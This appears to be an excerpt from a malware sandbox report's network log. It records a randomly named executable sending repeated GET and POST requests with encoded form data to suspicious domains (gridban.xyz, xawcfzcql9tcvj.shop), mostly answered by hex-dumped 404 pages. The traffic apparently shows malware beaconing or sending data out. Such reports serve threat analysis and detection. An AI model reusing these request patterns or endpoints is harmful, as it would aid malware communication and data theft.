                                                          Referer: http://www.gridban.xyz/hheq/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 44 53 76 44 51 2b 45 79 6a 4d 30 52 32 74 4e 4a 38 77 70 75 36 69 46 37 75 59 48 67 35 34 41 50 41 66 43 53 51 66 32 6d 6d 31 68 45 66 69 33 36 64 6b 6b 61 69 79 4d 74 63 47 50 70 6f 6e 50 63 4c 42 4d 63 68 35 2b 69 52 2f 52 65 45 39 45 54 77 37 50 36 4e 52 4a 2b 4b 61 46 2b 5a 51 32 4a 36 6e 4a 2f 38 71 57 72 47 41 74 53 64 79 41 31 54 38 76 74 73 38 38 4e 54 51 32 53 4e 76 65 64 37 41 76 42 45 49 36 6e 6e 42 37 5a 33 35 31 68 46 52 59 70 33 4e 46 57 6d 33 63 61 6c 57 66 5a 39 37 53 6b 30 31 37 69 50 4c 6d 34 64 4a 54 30 5a 75 71 55 52 42 73 39 64 6f 64 7a 4a 67 51 45 68 47 72 56 52 4d 5a 6f 77 72 78 74 49 50 61 54 31 61 65 31 75 50 4a 6e 57 33 36 65 6f 6c 54 43 43 41 54 31 79 6f 2b 65 30 76 4a 77 34 63 4a 4f 67 6d 4d 54 35 52 57 4f 32 46 42 56 69 50 35 49 67 48 6b 48 34 35 35 34 58 6d 73 62 57 6c 48 36 77 4c 71 69 64 72 53 35 38 74 57 6d 30 31 47 54 4a 48 2f 36 2f 4a 79 62 46 78 50 45 75 2b 79 32 68 6b 68 48 38 74 46 4d 50 62 75 42 59 4c 71 43 4e 57 5a 5a 56 6d 73 6a 53 76 6f 34 68 43 [TRUNCATED]
                                                          Data Ascii: 1Hg=DSvDQ+EyjM0R2tNJ8wpu6iF7uYHg54APAfCSQf2mm1hEfi36dkkaiyMtcGPponPcLBMch5+iR/ReE9ETw7P6NRJ+KaF+ZQ2J6nJ/8qWrGAtSdyA1T8vts88NTQ2SNved7AvBEI6nnB7Z351hFRYp3NFWm3calWfZ97Sk017iPLm4dJT0ZuqURBs9dodzJgQEhGrVRMZowrxtIPaT1ae1uPJnW36eolTCCAT1yo+e0vJw4cJOgmMT5RWO2FBViP5IgHkH4554XmsbWlH6wLqidrS58tWm01GTJH/6/JybFxPEu+y2hkhH8tFMPbuBYLqCNWZZVmsjSvo4hCb64aFQg1te2Wrnh8TiAUxZIhN4GxoLEapEOLy/f61qVUHuzrPM93oJkLG+8+IKnbGyhsFWiRC+leuQ/twVlr1O6LEzUXf8hL7Sg0oUXQTsteoMFdYPWPLzYv7UhjXK+UMi5K5TkyzXDA6+LOcRhfVRGjR24dpmS/i2CgurpFBCA50S38/c3NvuThviC2JSiYxKQtiC4d+ExSfFC3DlhoCkkpdEHYNP98305jdUkJr5GLcVrxAW3EE5/S5f//7HGK16NNXZuwmgb7E9BGhSBMgIVH8aIhqZ3zHxHelOxu71DbhA1ohPton4a4wn9JdDB7H0HyjrwnvSRVkiZNXJK9mx+bz3PlVgL89MGGFjzC4AzqjgMIrMjUp0PPVmtZfnzqFKJp5hk2vliUxgDGHdn4MhHuK/VcW/tr78dCmHzS5lXofyk6V23u7CepUprh7QhwpHsuhWKFA+VNzlisq3YjyCoZ6wiu4I5WHnO9SFagywUvGu/RU18wfLRQzpzPYl7kLQ4f909XvLnFAzHJOJANSj6J7D/t1j4+Z08uprlZKifpOj4gPHEhLMSUnxbFse8xFCayp7eVHLxIPxpFJ2SsGX28U6PT40BEoJBR6phY7xXwwZ7X9vWP/Mdy2DjNYyGBjc+H+D3Pr9TyxW6C9snVdKIdZBWMT23Oar [TRUNCATED]
                                                          Jul 26, 2024 18:47:50.654274940 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:50 GMT
                                                          Server: Apache
                                                          Content-Length: 16052
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                          Jul 26, 2024 18:47:50.655075073 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                          Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                          Jul 26, 2024 18:47:50.655103922 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                          Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                          Jul 26, 2024 18:47:50.657850027 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                          Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                          Jul 26, 2024 18:47:50.657866955 CEST1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                          Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                          Jul 26, 2024 18:47:50.661066055 CEST1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                          Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                          Jul 26, 2024 18:47:50.661083937 CEST776INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                          Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                          Jul 26, 2024 18:47:50.664283037 CEST1236INData Raw: 30 30 37 39 20 35 2e 31 65 2d 35 2c 31 37 2e 35 36 33 33 39 20 30 2e 34 31 32 36 31 37 2c 31 32 2e 35 35 35 34 38 20 31 2e 33 35 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33
                                                          Data Ascii: 0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:
                                                          Jul 26, 2024 18:47:50.664299011 CEST1236INData Raw: 32 35 31 20 36 2e 31 32 38 38 35 2c 2d 31 2e 32 33 37 37 34 20 39 2e 31 39 31 38 2c 2d 32 2e 30 36 32 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                          Data Ascii: 251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.
                                                          Jul 26, 2024 18:47:50.664313078 CEST1016INData Raw: 74 68 34 36 31 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                          Data Ascii: th4616" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:0.82170224;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse transform
                                                          Jul 26, 2024 18:47:50.667285919 CEST1236INData Raw: 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70
                                                          Data Ascii: 000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4570" d="m 325,163.45184 c 1.66722,0.6259


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.555166162.254.38.56807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:52.552531004 CEST465OUTGET /hheq/?1Hg=OQHjTIEzxI4+3uBJ4Ch4/gBE3u2u+7BoOuCOJurFjFRPYCarRFUfzgF9IWvn7XTpBRUAmOCVXs1kY9Zsut6EdHJsI9AJbTCs7iVD1ouYIWNqRmE7fP7CptgJfBKNW9KUkg==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.gridban.xyz
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Jul 26, 2024 18:47:53.160244942 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:53 GMT
                                                          Server: Apache
                                                          Content-Length: 16052
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                          Jul 26, 2024 18:47:53.160916090 CEST1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                          Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                          Jul 26, 2024 18:47:53.160928965 CEST1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                          Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                          Jul 26, 2024 18:47:53.164319038 CEST1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                          Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                          Jul 26, 2024 18:47:53.164331913 CEST896INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                                                          Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                                                          Jul 26, 2024 18:47:53.166889906 CEST1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                          Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                          Jul 26, 2024 18:47:53.166903973 CEST1236INData Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                          Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
                                                          Jul 26, 2024 18:47:53.169164896 CEST1236INData Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                                                          Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
                                                          Jul 26, 2024 18:47:53.169177055 CEST1236INData Raw: 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20
                                                          Data Ascii: width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inl
                                                          Jul 26, 2024 18:47:53.171744108 CEST896INData Raw: 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 38 32 31 37 30 32 32 34 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d
                                                          Data Ascii: :#000000;stroke-width:0.82170224;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse transform="translate(-170.14515,-0.038164)" ry="3.880542" rx="3.5777507" cy
                                                          Jul 26, 2024 18:47:53.171756029 CEST1236INData Raw: 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79
                                                          Data Ascii: onzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4570" d="m 325,163.45184 c


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.555167142.171.29.133807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:58.348274946 CEST734OUTPOST /jug9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.xawcfzcql9tcvj.shop
                                                          Origin: http://www.xawcfzcql9tcvj.shop
                                                          Referer: http://www.xawcfzcql9tcvj.shop/jug9/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 46 55 66 61 45 76 35 70 47 72 76 33 41 66 52 4e 64 58 71 78 59 6f 4f 76 4c 51 41 79 34 51 30 43 44 79 59 37 7a 59 68 70 54 79 38 53 38 70 66 77 4c 4d 43 66 37 35 54 36 57 54 48 47 77 42 79 4f 5a 61 49 6d 77 53 41 58 55 7a 56 65 68 7a 45 31 2b 64 55 64 4d 2b 54 35 6b 4b 44 6f 42 70 39 2b 54 50 2f 52 69 52 56 46 67 32 2b 53 47 46 4d 73 49 6e 6a 73 57 72 79 4b 30 73 42 32 64 57 37 4b 2b 57 68 4c 72 7a 49 32 30 47 52 42 6f 69 2f 54 53 67 67 30 54 7a 75 34 32 78 43 49 67 79 6d 6e 57 66 71 56 63 61 33 61 6d 31 6f 68 44 65 63 51 30 35 35 32 7a 56 36 33 53 48 39 47 79 58 47 52 56 56 61 41 51 76 59 3d
                                                          Data Ascii: 1Hg=FUfaEv5pGrv3AfRNdXqxYoOvLQAy4Q0CDyY7zYhpTy8S8pfwLMCf75T6WTHGwByOZaImwSAXUzVehzE1+dUdM+T5kKDoBp9+TP/RiRVFg2+SGFMsInjsWryK0sB2dW7K+WhLrzI20GRBoi/TSgg0Tzu42xCIgymnWfqVca3am1ohDecQ0552zV63SH9GyXGRVVaAQvY=
                                                          Jul 26, 2024 18:47:58.931396008 CEST433INHTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:58 GMT
                                                          Server: Apache
                                                          Content-Length: 269
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 78 61 77 63 66 7a 63 71 6c 39 74 63 76 6a 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.xawcfzcql9tcvj.shop Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          30192.168.2.555168142.171.29.13380
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:48:01.433706045 CEST754OUTPOST /jug9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.xawcfzcql9tcvj.shop
                                                          Origin: http://www.xawcfzcql9tcvj.shop
                                                          Referer: http://www.xawcfzcql9tcvj.shop/jug9/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
